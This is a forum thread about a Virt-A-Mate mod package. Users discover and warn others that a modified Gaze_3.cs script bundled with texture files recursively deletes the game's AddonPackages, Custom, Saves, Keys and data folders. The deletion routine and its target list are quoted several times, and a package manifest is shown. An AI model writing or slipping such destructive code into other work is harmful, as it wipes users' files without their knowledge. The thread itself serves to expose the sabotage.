Collection Mod Unity Virt-A-Mate Mod Assets: Clothing,Environments,Objects,Scenes,Looks,ect.

5.00 star(s) 5 Votes
Status
Not open for further replies.

tna20

Newbie
Jul 11, 2019
67
157
I see some .json files. Are these intended to be used with VamDeluxe's EmotionEngine?
No idea - i find the pack to confusing to be productive with it - but it satisfies the need to have something for free :LOL:

Also checked with CloneSpy and already got 90% of it in different locations/scenes
 

kraoro

Active Member
Jul 9, 2017
892
1,118
Thank you! I've been looking for that one for a while now. Not every hero wears a cape.:BootyTime:
 
Last edited by a moderator:

mailauto

Newbie
Jul 12, 2020
20
137
He's not wrong, there is a modified Gaze_3.cs in the var with this code in the middle :
Code:
        private static void rd(string p) {
                foreach(string f in FileManagerSecure.GetFiles(p)) {
                    try{
                        FileManagerSecure.DeleteFile(f);
                    }catch (System.Exception e1) {
                       
                    }
                   
                }
                foreach(string d in FileManagerSecure.GetDirectories(p)){
                    rd(d);
                }
        }
 

AJACKS

New Member
Jan 6, 2020
9
9
I have successfully opened the file, man, are there other problems in your computer?
I converted the .var to .rar, in Custom/Scripts found Gaze_3.cs.

It does contain code that will delete everything in your vam folder :

"
Code:
rd("AddonPackages");

        rd("Custom");

        rd("Saves");

        rd("Cache");

        rd("Keys");

        rd("VaM_Data");


[...]

private static void rd(string p) {

                foreach(string f in FileManagerSecure.GetFiles(p)) {

                    try{

                        FileManagerSecure.DeleteFile(f);

                    }catch (System.Exception e1) {

                        

                    }

                    

                }

                foreach(string d in FileManagerSecure.GetDirectories(p)){

                    rd(d);

                }

        }
"
 

Jeriho3

Member
Aug 13, 2019
148
951
He's not wrong, there is a modified Gaze_3.cs in the var with this code in the middle :
Code:
        private static void rd(string p) {
                foreach(string f in FileManagerSecure.GetFiles(p)) {
                    try{
                        FileManagerSecure.DeleteFile(f);
                    }catch (System.Exception e1) {
                    
                    }
                
                }
                foreach(string d in FileManagerSecure.GetDirectories(p)){
                    rd(d);
                }
        }
That what I've also found when I checked the files to see something is wrong but I didn't know what it meant.
Fucking salty content creators, I'm subbed to like 10 and from now on all of them can fuck themself.
Is there anything I can do to restore my shit? I had so much stuff that was orginazied they way I want and stuff that I created for myself :(
 
  • Like
Reactions: dudedudester4vrvr4

Hitamaru

Member
May 24, 2019
327
92
i looking for heidi and micky if someone have =( ? mega is empty they was free looks
 

tester32

New Member
Jan 16, 2018
8
15
Just check also the file bamair1984 SS json --> there is also something wrong

----------------
{
"licenseType" : "CC BY",
"creatorName" : "UJVAM",
"packageName" : "Real_Textures",
"standardReferenceVersionOption" : "Latest",
"scriptReferenceVersionOption" : "Exact",
"description" : "",
"credits" : "",
"instructions" : "",
"promotionalLink" : "",
"programVersion" : "1.20.1.5",
"contentList" : [
"Saves/scene/Real Textures.json",
"Saves/scene/Real Textures.jpg",
"Custom/Scripts/Gaze_3.cs",
"Custom/Atom/Person/Textures/FemaleBase/faceD.jpg",
"Custom/Atom/Person/Textures/FemaleBase/torsoD.jpg",
"Custom/Atom/Person/Textures/FemaleBase/limbsD.jpg",
"Custom/Atom/Person/Textures/FemaleBase/genitalsD.png",
"Custom/Atom/Person/Textures/FemaleBase/faceS.jpg",
"Custom/Atom/Person/Textures/FemaleBase/torsoS.jpg",
"Custom/Atom/Person/Textures/FemaleBase/limbsS.jpg",
"Custom/Atom/Person/Textures/FemaleBase/genitalsS.png",
"Custom/Atom/Person/Textures/FemaleBase/faceBrowlessG.jpg",
"Custom/Atom/Person/Textures/FemaleBase/torsoG.jpg",
"Custom/Atom/Person/Textures/FemaleBase/limbsG.jpg",
"Custom/Atom/Person/Textures/FemaleBase/genitalsG.png",
"Custom/Atom/Person/Textures/FemaleBase/faceN.tif",
"Custom/Atom/Person/Textures/FemaleBase/torsoN.tif",
"Custom/Atom/Person/Textures/FemaleBase/limbsN.tif",
"Custom/Atom/Person/Textures/FemaleBase/genitalsN.tif",
"Custom/Atom/Person/Textures/FemaleBase/faceDecal.png"
],
"dependencies" : {
},
"customOptions" : {
"preloadMorphs" : "false"
}
}
 
Status
Not open for further replies.
5.00 star(s) 5 Votes